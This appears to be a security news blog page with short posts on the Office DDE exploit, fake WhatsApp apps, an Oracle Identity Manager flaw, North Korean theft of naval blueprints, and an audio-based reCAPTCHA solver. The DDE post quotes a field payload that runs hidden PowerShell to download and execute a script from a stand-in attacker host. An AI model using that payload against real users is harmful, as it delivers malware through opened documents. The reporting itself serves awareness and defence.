Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using it’s Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data is becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute command prompt, also calling your payload. In the proof of concept demonstration, they used a powershell command to launch an Empire stager as the payload.

Whenever the Word document is opened it will ask first for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt which is a security warning due to the DDE asking for access to command prompt, however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the word file on the target system, and get the target to open the file, and click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE related vulnerabilities, most involve the user changing settings to use Secure and Control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also use Microsoft’s recommendation using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.

 

Daniel Szafran

 

Article Sources:

Macro-less Code Exec in MSWord    – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

Advertisements

Google Play Store Fails Vetting Again…

whatsapp-bubbles-664x374

In case you haven’t noticed, I like beating up on the Google Play Store just a bit. More fake apps were released onto the Play Store. Instead of stealing personal information through phony banking apps, attackers are now spamming users with ads through fake WhatsApp messenger lookalikes.

Continue reading

Oracle Identity Manager Hacked through a Critical Flaw

 

Based in Redwood, California, Oracle Corporation is the largest software company whose primary business is database products. Historically, Oracle has targeted high-end workstations and minicomputers as the server platforms to run its database systems. Its relational database was the first to support the SQL language, which has since become the industry standard.

A exploit was found in Oracle’s identity management system. This exploix has been marked as CVE-2017-10151, it has been assigned the highest CVSS score of 10 and is easy to exploit without any user interaction.

This CVE is due to a security loophole involving a default account that allows an unathenticated attacker on the same network to compromise the Oracle Identity Manager through HTTP.

The full details of this vulnerability have not yet been released by Oracle.

“This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials,” Oracle’s advisory reads.

The easily exploitable vulnerability affects Oracle Identity Manager versions 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0 and 12.2.1.3.0.

Oracle has already released patches for all versions of the products that were affected by this CVE. all users should update to the latest version of Oracle to patch the vulnerability before a hacker has the chance to exploit it.

Justin Palmer

Sources:

https://thehackernews.com/2017/10/oracle-identity-manager.html

https://www.oracle.com/index.html

 

North Korea Hackers Accused of Stealing Secret Blueprints of South Korea’s Submarine Weapon Systems

28-KimJongUn-AFP-4

 

North Korean hackers have broken into computer systems in South Korea and stolen classified documents containing blueprints for submarines and warships, it has been alleged. They illegally accessed systems of Daewoo Shipbuilding and stole around 40,000 documents, according to South Korean politician Kyeong Dae-soo. Sixty “classified documents including blueprints and technical data for submarines and vessels equipped with Aegis weapon systems” made their way into North Korean hands.

The breach was discovered by the South Korean defense ministry. According to Kyung Dae-soo of the main opposition Liberty Korea Party. “We are almost 100 percent certain that North Korean hackers were behind the hacking and stole the company’s sensitive documents,” Kyeong told Reuters. A team investigating the hack concluded that North Korea was behind the attack after they reportedly uncovered similarities with other attacks known to have been previously conducted by North Korean hackers.

The country is also in the middle of building a brand new submarine that could potentially launch nuclear missiles. As US intelligence assesses that North Korea has begun construction of a new class of 2,000-ton submarine which Kim Jong-un could use to launch country’s nuclear missiles. Its existence hasn’t been confirmed yet, but US intelligence sources are closely monitoring the country’s shipyards in order to get an idea of what is happening.

 

Citations:

http://www.ibtimes.co.uk/north-korea-accused-hacking-stealing-secret-blueprints-south-korean-warships-submarines-1645245

http://www.mirror.co.uk/tech/north-korean-hackers-accused-stealing-11441008

http://www.businessinsider.com/north-korea-stole-submarines-technology-south-korea-2017-10

-Matthew Brown

UnCaptcha Cracks Google ReCaptcha with 85% Accuracy

One of the internet’s favorite ways of verifying that traffic is coming from actual people and not bots are captchas. Those little boxes with pictures of street signs have proven notoriously difficult for robots to crack, despite increasing progress in machine learning making progress on recognizing images. Recently, however, researchers at the University of Maryland have figured out a new, easier way to crack these pesky security measures.

Rather than looking at the images provided by Google, their new system UnCaptcha uses the available audio captcha in order to circumvent the complexities of image processing.

reCAPTCHA-Step1

The program works by passing the audio played by the program to various speech to text algorithms. It uses Bing Speech Recognition, IBM, and the Google Cloud API along with phonetic processing to determine exact and near homophones and plug its results back into the captcha.

The researchers have been able to achieve about 85% accuracy with this system, which is available on Github. Google has noticed the release of this captcha cracker, and recently started adding certain bits of spoken text into their audio recordings.

https://www.infosecurity-magazine.com/news/uncaptcha-defeats-google-captcha/

https://www.bleepingcomputer.com/news/technology/uncaptcha-breaks-450-recaptchas-in-under-6-seconds/